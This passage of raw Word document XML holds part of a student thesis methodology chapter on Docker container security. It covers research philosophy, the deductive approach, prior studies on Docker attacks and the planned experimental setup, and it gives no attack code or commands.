        <w:t>data methodology. Positivism philosophy is a method that argues through scientific evidence, such as observation, experiment, and logical reasoning</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F46144">
        <w:t xml:space="preserve"> to prove or formulate a hypothesis.</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve"> T</w:t>
      </w:r>
      <w:r w:rsidR="00F46144">
        <w:t>his project</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> uses</w:t>
      </w:r>
      <w:r w:rsidR="00F46144">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t>experiment</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>al method</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>examine</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t>investigate</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> data, </w:t>
      </w:r>
      <w:r w:rsidR="0066454A">
        <w:t xml:space="preserve">involving observation with specific data, </w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t>and thus</w:t>
      </w:r>
      <w:r w:rsidR="00EA51FD">
        <w:t xml:space="preserve"> the project’s philosophy lies in the positivism category</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="889228262"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="0066454A">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="0066454A">
            <w:instrText xml:space="preserve"> CITATION BRM21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="0066454A">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[80]</w:t>
          </w:r>
          <w:r w:rsidR="0066454A">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00EA51FD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007558B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C962B7A" w14:textId="2CAB8670" w:rsidR="0066454A" w:rsidRDefault="0066454A" w:rsidP="001833CF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="718E4B92" wp14:editId="6BEE3671">
            <wp:extent cx="4984750" cy="30226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4750" cy="3022600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851C299" w14:textId="3DB40C72" w:rsidR="002417B0" w:rsidRPr="00D71273" w:rsidRDefault="001833CF" w:rsidP="00D71273">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc86858598"/>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Research onion</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1861816710"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="001833CF">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="001833CF">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION AMe18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="001833CF">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[81]</w:t>
          </w:r>
          <w:r w:rsidRPr="001833CF">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="001833CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="459AC53E" w14:textId="26BF46E4" w:rsidR="001833CF" w:rsidRDefault="001833CF" w:rsidP="001833CF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc86859277"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RESEARCH APPROACH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="453EEE33" w14:textId="57248E51" w:rsidR="00197404" w:rsidRDefault="001E1D39" w:rsidP="001833CF">
      <w:r>
        <w:t xml:space="preserve">The research onion comprises two approaches: deductive and inductive. The deductive approach is </w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t xml:space="preserve">used to test </w:t>
      </w:r>
      <w:r w:rsidR="004D33F3">
        <w:t xml:space="preserve">a hypothesis based </w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t xml:space="preserve">on an existing theory, while </w:t>
      </w:r>
      <w:r w:rsidR="00113A9B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t>inductive</w:t>
      </w:r>
      <w:r w:rsidR="00113A9B">
        <w:t xml:space="preserve"> approach</w:t>
      </w:r>
      <w:r w:rsidR="005E3FBC">
        <w:t xml:space="preserve"> is applied in developing a theory</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1237983287"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BF379E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BF379E">
            <w:instrText xml:space="preserve"> CITATION PKO07 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BF379E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[82]</w:t>
          </w:r>
          <w:r w:rsidR="00BF379E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="005E3FBC">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004D33F3">
        <w:t xml:space="preserve"> As for this project, deductive reasoning was applied </w:t>
      </w:r>
      <w:r w:rsidR="004B7513">
        <w:t>through an extensive literature review on pr</w:t>
      </w:r>
      <w:r w:rsidR="00704887">
        <w:t>ior</w:t>
      </w:r>
      <w:r w:rsidR="004B7513">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004163C6">
        <w:t>stud</w:t>
      </w:r>
      <w:r w:rsidR="00704887">
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="004163C6">
        <w:t xml:space="preserve">findings to validate </w:t>
      </w:r>
      <w:r w:rsidR="00704887">
        <w:t xml:space="preserve">and test </w:t>
      </w:r>
      <w:r w:rsidR="009D1967">
        <w:t xml:space="preserve">the project’s hypothesis. The literature review was conducted on previous studies similar to the project’s topic to </w:t>
      </w:r>
      <w:r w:rsidR="00113A9B">
        <w:t>grasp the methods and techniques used to conduct the experiment in achieving the project’s goals.</w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve"> Thereby, deductive reasoning was used to prove or disprove the experimen</w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t>tal</w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve"> results</w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r w:rsidR="00497C36">
        <w:t>comparing</w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007A2BD9">
        <w:t xml:space="preserve">them </w:t>
      </w:r>
      <w:r w:rsidR="0053766E">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00497C36">
        <w:t>previous</w:t>
      </w:r>
      <w:r w:rsidR="00F84A48">
        <w:t xml:space="preserve"> studies.</w:t>
      </w:r>
      <w:r w:rsidR="00497C36">
        <w:t xml:space="preserve"> Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="00CC7A31">
        <w:t xml:space="preserve"> this project will deduct </w:t>
      </w:r>
      <w:r w:rsidR="007A2BD9">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00CC7A31">
        <w:t>conclusion with the help of the experimental research and data</w:t>
      </w:r>
      <w:r w:rsidR="007A2BD9">
        <w:t xml:space="preserve"> obtained</w:t>
      </w:r>
      <w:r w:rsidR="00CC7A31">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t xml:space="preserve"> The reasons why the researcher used </w:t>
      </w:r>
      <w:r w:rsidR="00D9485D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t xml:space="preserve">deductive approach for this project </w:t>
      </w:r>
      <w:r w:rsidR="00D9485D">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t xml:space="preserve"> covered in the following sub-sections, prov</w:t>
      </w:r>
      <w:r w:rsidR="00D9485D">
        <w:t xml:space="preserve">iding </w:t>
      </w:r>
      <w:r w:rsidR="00197404">
        <w:t>supportive arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC5B34F" w14:textId="38A17BA6" w:rsidR="00C27030" w:rsidRDefault="00D9485D" w:rsidP="00C27030">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc86859278"/>
      <w:r>
        <w:t>Literature Reviews</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="26116DF1" w14:textId="3528229D" w:rsidR="00C27030" w:rsidRPr="00C27030" w:rsidRDefault="00C27030" w:rsidP="00C27030">
      <w:r>
        <w:t xml:space="preserve">According to Yasrib in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1792818874"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION RYa18 \l 2057 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[51]</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>, Docker is vulnerable to various security vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="009C4F43">
        <w:t xml:space="preserve"> if used without appropriate configurations</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009C4F43">
        <w:t xml:space="preserve"> Based on prior research and theory, Yasrib hypothesised that Docker is vulnerable to security threats, such as Dos, ARP spoofing, MitM, poisoned images, </w:t>
      </w:r>
      <w:r w:rsidR="005A58A5">
        <w:t xml:space="preserve">privilege attacks, </w:t>
      </w:r>
      <w:r w:rsidR="00140BD0">
        <w:t>etc. The author</w:t>
      </w:r>
      <w:r w:rsidR="005A58A5">
        <w:t xml:space="preserve"> found support for his hypothesis from Docker documentation and other related works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F5723F" w14:textId="027F76C6" w:rsidR="00C27030" w:rsidRPr="00C27030" w:rsidRDefault="00C27030" w:rsidP="00C27030">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc86859279"/>
      <w:r>
        <w:t xml:space="preserve">Experimental </w:t>
      </w:r>
      <w:r w:rsidR="005A58A5">
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>pproach 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="4BF08A83" w14:textId="6DBF4963" w:rsidR="00D9485D" w:rsidRDefault="00D9485D" w:rsidP="001833CF">
      <w:r>
        <w:t xml:space="preserve">In a study by </w:t>
      </w:r>
      <w:r w:rsidR="00BA03D7">
        <w:t xml:space="preserve">Tomar and Jeena in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1549982279"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00BA03D7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00BA03D7">
            <w:instrText xml:space="preserve"> CITATION ATo20 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00BA03D7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[77]</w:t>
          </w:r>
          <w:r w:rsidR="00BA03D7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00857E0E">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Docker security is not mature yet. The authors </w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t>formulated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F01560">
        <w:t>their hypothesis from their literature review on previous works related to the topic.</w:t>
      </w:r>
      <w:r w:rsidR="00857E0E">
        <w:t xml:space="preserve"> Next, they tested the hypothesis by experimenting with Dos attack on Docker containers and analysing the data during and after the attack. With such an approach, their Dos attack was successful, supporting their hypothesis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CA717C" w14:textId="6EFC341D" w:rsidR="005A58A5" w:rsidRDefault="005A58A5" w:rsidP="005A58A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc86859280"/>
      <w:r>
        <w:t>Experimental Approach 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="62BEB40F" w14:textId="06B8DE15" w:rsidR="00187A58" w:rsidRDefault="00F30803" w:rsidP="005A58A5">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00A06253">
        <w:t xml:space="preserve">n another study in </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-619918534"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00A06253">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00A06253">
            <w:instrText xml:space="preserve"> CITATION AAM16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00A06253">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[78]</w:t>
          </w:r>
          <w:r w:rsidR="00A06253">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A06253">
        <w:t xml:space="preserve"> Docker is more vulnerable compared to VM.</w:t>
      </w:r>
      <w:r w:rsidR="00187A58">
        <w:t xml:space="preserve"> To </w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t>develop</w:t>
      </w:r>
      <w:r w:rsidR="00187A58">
        <w:t xml:space="preserve"> their hypothesis, the authors researched based on prior works related to the topic, specifically Docker and VM architecture</w:t>
      </w:r>
      <w:r w:rsidR="00905734">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00125AF9">
        <w:t xml:space="preserve"> To test their hypothesis, they setup</w:t>
      </w:r>
      <w:r w:rsidR="0025530B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00125AF9">
        <w:t>two servers</w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t>, one for VM and one for Docker containers, each</w:t>
      </w:r>
      <w:r w:rsidR="00125AF9">
        <w:t xml:space="preserve"> with the same services and OS install</w:t>
      </w:r>
      <w:r w:rsidR="0025530B">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00C17C57">
        <w:t xml:space="preserve">. Then, they run a vulnerability scan to examine the risk level of each host. The authors found support for their hypothesis, showing that </w:t>
      </w:r>
      <w:r w:rsidR="002417B0">
        <w:t>containers are more exposed to security vulnerabilities compared to VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7034FC70" w14:textId="1AD551E8" w:rsidR="00D71273" w:rsidRDefault="00D71273" w:rsidP="00D71273">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc86859281"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>RESEARCH STRATEGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="057CC016" w14:textId="00534414" w:rsidR="00D61293" w:rsidRDefault="00D71273" w:rsidP="00D71273">
      <w:r>
        <w:t xml:space="preserve">The strategies used to undertake this project </w:t>
      </w:r>
      <w:r w:rsidR="00B45E81">
        <w:t>involves research, experiment</w:t>
      </w:r>
      <w:r>
        <w:t>, and software development.</w:t>
      </w:r>
      <w:r w:rsidR="00B45E81">
        <w:t xml:space="preserve"> The research </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t>strategy include</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t>d a</w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t xml:space="preserve"> literature review and background study on </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t>Docker technology</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t xml:space="preserve"> and was conducted using </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t>various</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t xml:space="preserve"> sources, including google scholar, IEEE explorer, journals, and academic scholars</w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t xml:space="preserve">. The background research </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve">aim </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t xml:space="preserve">was to </w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve">gain </w:t>
      </w:r>
      <w:r w:rsidR="00D538B7">
        <w:t>better understanding of Docker ecosystem</w:t>
      </w:r>
      <w:r w:rsidR="00726E9B">
        <w:t xml:space="preserve"> in general, specifically into fields related to the project’s subject.</w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve"> The literature review strategy </w:t>
      </w:r>
      <w:r w:rsidR="00343803">
        <w:t>comprised</w:t>
      </w:r>
      <w:r w:rsidR="00D61293">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343803">
        <w:t xml:space="preserve">works similar to this project topic done by others, focusing more on current Docker security attacks and their remediation </w:t>
      </w:r>
      <w:r w:rsidR="00B24F56">
        <w:t>methodologies to assist the experiment process. This included critical information, including tools used, the attacks performed</w:t>
      </w:r>
      <w:r w:rsidR="00265820">
        <w:t>, and the experiment set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412775B5" w14:textId="3C982A25" w:rsidR="00406E1D" w:rsidRDefault="00265820" w:rsidP="00D71273">
      <w:r>
        <w:t>Further, this project utilised scripts to run and build Docker images</w:t>
      </w:r>
      <w:r w:rsidR="00842E2C">
        <w:t xml:space="preserve"> as a software development strategy. Finally, the experiment strategy compris</w:t>
      </w:r>
      <w:r w:rsidR="00F81921">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00842E2C">
        <w:t xml:space="preserve"> both hardware and software tools to perform the security attacks. The experiment process is predominately </w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t>constructed based on the critical information gained from the literature review</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t xml:space="preserve"> conducted on </w:t>
      </w:r>
      <w:r w:rsidR="004E1FB6">
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="006E2D4E">
        <w:t xml:space="preserve"> version 20.04 with Docker installed.</w:t>
      </w:r>
      <w:r w:rsidR="00406E1D">
        <w:t xml:space="preserve"> Each attack was experimented using different Docker images and containers, where all the containers use the default bridge network </w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t xml:space="preserve">mode </w:t>
      </w:r>
      <w:r w:rsidR="00406E1D">
        <w:t>to communicate.</w:t>
      </w:r>
      <w:r w:rsidR="00D17086">
        <w:t xml:space="preserve"> Lastly, data </w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t>from each attack</w:t>
      </w:r>
      <w:r w:rsidR="00F81921">
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="00D17086">
        <w:t xml:space="preserve">collected and compared </w:t>
      </w:r>
      <w:r w:rsidR="004D6155">
        <w:t>with the</w:t>
      </w:r>
      <w:r w:rsidR="00F81921">
        <w:t xml:space="preserve"> relevant data gained from the literature review to conclude.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B162C19" w14:textId="22F20C8B" w:rsidR="00F81921" w:rsidRDefault="002B0313" w:rsidP="00F81921">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc86859282"/>
      <w:r>
        <w:t>TIME HORIZONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="3AD8070A" w14:textId="6785D7FC" w:rsidR="002B0313" w:rsidRDefault="00FF2455" w:rsidP="002B0313">
      <w:r>
        <w:t xml:space="preserve">This project uses a cross-sectional approach as its time frame to study, collect and observe data. Cross-sectional is more apt for short term study, involving </w:t>
      </w:r>
      <w:r w:rsidR="00B65AD9">
        <w:t>collection and observation of data at a given point of time.</w:t>
      </w:r>
      <w:r w:rsidR="004E19BE">
        <w:t xml:space="preserve"> As for this project, the result of the experiment is collected and observed</w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E19BE">
        <w:t xml:space="preserve">over a </w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve">short </w:t>
      </w:r>
      <w:r w:rsidR="004E19BE">
        <w:t>period of time</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t>, and t</w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t>hus</w:t>
      </w:r>
      <w:r w:rsidR="00721CFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve">this project </w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00552520">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="003B172D">
        <w:t>cross-sectional method</w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00951F46">
        <w:t>as data</w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t xml:space="preserve"> collect</w:t>
      </w:r>
      <w:r w:rsidR="00951F46">
        <w:t>ion</w:t>
      </w:r>
      <w:r w:rsidR="004855E0">
        <w:t xml:space="preserve"> and obser</w:t>
      </w:r>
      <w:r w:rsidR="00951F46">
        <w:t>vation occur only during the experiment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC86215" w14:textId="7ABEBBBC" w:rsidR="004855E0" w:rsidRDefault="004855E0" w:rsidP="004855E0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
